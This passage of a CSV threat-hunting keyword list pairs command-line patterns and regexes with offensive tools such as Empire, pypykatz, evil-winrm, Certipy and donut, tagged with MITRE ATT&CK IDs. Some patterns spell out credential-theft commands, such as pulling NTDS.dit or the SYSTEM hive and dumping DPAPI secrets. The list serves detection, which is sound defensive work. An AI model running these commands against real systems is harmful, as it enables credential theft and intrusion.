Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-srv-enum.nse*",".{0,1000}\sdns\-srv\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dnsstager.py*",".{0,1000}\sdnsstager\.py.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","10","6","598","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z" "* -dns-tcp -nameserver * -dc-ip*",".{0,1000}\s\-dns\-tcp\s\-nameserver\s.{0,1000}\s\-dc\-ip.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "* dns-update.nse*",".{0,1000}\sdns\-update\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-zeustracker.nse*",".{0,1000}\sdns\-zeustracker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-zone-transfer.nse*",".{0,1000}\sdns\-zone\-transfer\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* docker-version.nse*",".{0,1000}\sdocker\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -domain * /dc * /service cifs /ptt*",".{0,1000}\s\-domain\s.{0,1000}\s\/dc\s.{0,1000}\s\/service\scifs\s\/ptt.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","0","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" "* --domain * --kerberos*",".{0,1000}\s\-\-domain\s.{0,1000}\s\-\-kerberos.{0,1000}","offensive_tool_keyword","gMSADumper","Lists who can read any gMSA password blobs and parses them if the current user has access.","T1552.001 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/micahvandeusen/gMSADumper","1","0","N/A","N/A","3","224","40","2024-02-12T02:15:32Z","2021-04-10T00:15:24Z" "* -Domain * -SMB1 *",".{0,1000}\s\-Domain\s.{0,1000}\s\-SMB1\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SMBExec.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* domainDumper*",".{0,1000}\sdomainDumper.{0,1000}","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Discovery","https://github.com/dirkjanm/ldapdomaindump","1","0","N/A","10","10","1068","180","2024-02-13T12:41:07Z","2016-05-24T18:46:56Z" "* domainhunter *",".{0,1000}\sdomainhunter\s.{0,1000}","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","0","N/A","N/A","10","1466","285","2023-11-23T05:38:05Z","2017-03-01T11:16:26Z" "* --domains ./domains.txt run*",".{0,1000}\s\-\-domains\s\.\/domains\.txt\srun.{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","N/A","6","7","627","110","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" "* domcachedump.py*",".{0,1000}\sdomcachedump\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* domcon-brute.nse*",".{0,1000}\sdomcon\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* domcon-cmd.nse*",".{0,1000}\sdomcon\-cmd\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dome.py*",".{0,1000}\sdome\.py.{0,1000}","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","0","N/A","N/A","5","451","62","2024-02-07T09:12:17Z","2022-02-20T15:09:40Z" "* domino-enum-users.nse*",".{0,1000}\sdomino\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -DoNotPersistImmediately *",".{0,1000}\s\-DoNotPersistImmediately\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* --dont-enumerate-acls *",".{0,1000}\s\-\-dont\-enumerate\-acls\s.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","675","78","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" "* --dont-enumerate-acls * -e *",".{0,1000}\s\-\-dont\-enumerate\-acls\s.{0,1000}\s\-e\s.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","675","78","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" "* --donut --rehash n --silent -o /tmp/*",".{0,1000}\s\-\-donut\s\-\-rehash\sn\s\-\-silent\s\-o\s\/tmp\/.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "* donut.c *",".{0,1000}\sdonut\.c\s.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "* donut.exe *",".{0,1000}\sdonut\.exe\s.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "* donut.o *",".{0,1000}\sdonut\.o\s.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "* --dotnetassembly * --amsi*",".{0,1000}\s\-\-dotnetassembly\s.{0,1000}\s\-\-amsi.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","547","113","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "* --dotnetassembly * --appdomain *",".{0,1000}\s\-\-dotnetassembly\s.{0,1000}\s\-\-appdomain\s.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","547","113","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "* --dotnetassembly * --assemblyargs *",".{0,1000}\s\-\-dotnetassembly\s.{0,1000}\s\-\-assemblyargs\s.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","547","113","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "* --dotnetassembly * --mailslot*",".{0,1000}\s\-\-dotnetassembly\s.{0,1000}\s\-\-mailslot.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","547","113","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "* --dotnetassembly * --pipe *",".{0,1000}\s\-\-dotnetassembly\s.{0,1000}\s\-\-pipe\s.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","547","113","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "* -Downgrade False -Restore False -Impersonate True * -challange *",".{0,1000}\s\-Downgrade\sFalse\s\-Restore\sFalse\s\-Impersonate\sTrue\s.{0,1000}\s\-challange\s.{0,1000}","offensive_tool_keyword","Internal-Monologue","Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS","T1003 - T1051 - T1574 - T1110 - T1547","TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/eladshamir/Internal-Monologue","1","0","N/A","N/A","10","1329","240","2018-10-11T12:13:08Z","2017-12-09T05:59:01Z" "* download *\NTDS\NTDS.dit*",".{0,1000}\sdownload\s.{0,1000}\\NTDS\\NTDS\.dit.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","4167","582","2024-04-29T07:48:05Z","2019-05-28T10:53:00Z" "* download *\Windows\System32\config\SYSTEM*",".{0,1000}\sdownload\s.{0,1000}\\Windows\\System32\\config\\SYSTEM.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","N/A","10","4167","582","2024-04-29T07:48:05Z","2019-05-28T10:53:00Z" "* dpap-brute.nse*",".{0,1000}\sdpap\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dpapi blob *.json *.dat*",".{0,1000}\sdpapi\sblob\s.{0,1000}\.json\s.{0,1000}\.dat.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* dpapi credential *.json cred*",".{0,1000}\sdpapi\scredential\s.{0,1000}\.json\scred.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* dpapi masterkey /root/*",".{0,1000}\sdpapi\smasterkey\s\/root\/.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* dpapi minidump *.dmp*",".{0,1000}\sdpapi\sminidump\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* dpapi prekey nt *S-1-5-21*",".{0,1000}\sdpapi\sprekey\snt\s.{0,1000}S\-1\-5\-21.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* dpapi prekey password *",".{0,1000}\sdpapi\sprekey\spassword\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* dpapi prekey registry *.reg*",".{0,1000}\sdpapi\sprekey\sregistry\s.{0,1000}\.reg.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* dpapi securestring *.dat*",".{0,1000}\sdpapi\ssecurestring\s.{0,1000}\.dat.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* Dpapi.ps1*",".{0,1000}\sDpapi\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "* dpapi_domain_backupkey.py*",".{0,1000}\sdpapi_domain_backupkey\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* dpapi_masterkey.py*",".{0,1000}\sdpapi_masterkey\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 